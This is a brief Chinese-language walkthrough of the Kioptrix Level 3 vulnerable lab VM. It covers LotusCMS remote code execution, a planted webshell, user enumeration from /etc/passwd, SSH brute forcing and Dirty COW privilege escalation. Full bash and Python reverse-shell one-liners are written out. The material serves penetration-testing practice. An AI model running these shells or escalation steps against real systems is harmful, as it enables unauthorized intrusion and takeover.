KioptrixVM3¶
知识整理 |
---|
远程代码执行漏洞 |
后渗透信息收集 |
SSH爆破 |
内核提权 |
usershell¶
目标IP:192.168.205.133
端口信息
Web服务是LotusCMS
存在远程代码执行漏洞
尝试使用/bin/bash -i >& /dev/tcp/[ip]/[port] 0>&1
反弹shell失败,写入一个Webshell再进行进一步利用
目标机器上发现Python 2.5.2
尝试使用Python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",[port]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
获取到www-data
权限
SSH爆破
cat /etc/passwd|grep home|cut -d : -f 1
获取到两个可登陆的用户名
由于ssh版本太久,没有办法爆破,但是根据WP,是可以爆破的,并且会有一个sudo组的权限
rootshell¶
内核提权
直接根据WWW权限即可使用脏牛提权
常规提权流程
爆破得到loneferret
权限,使用ht
可以任意写入/读取文件,和脏牛达到的效果相同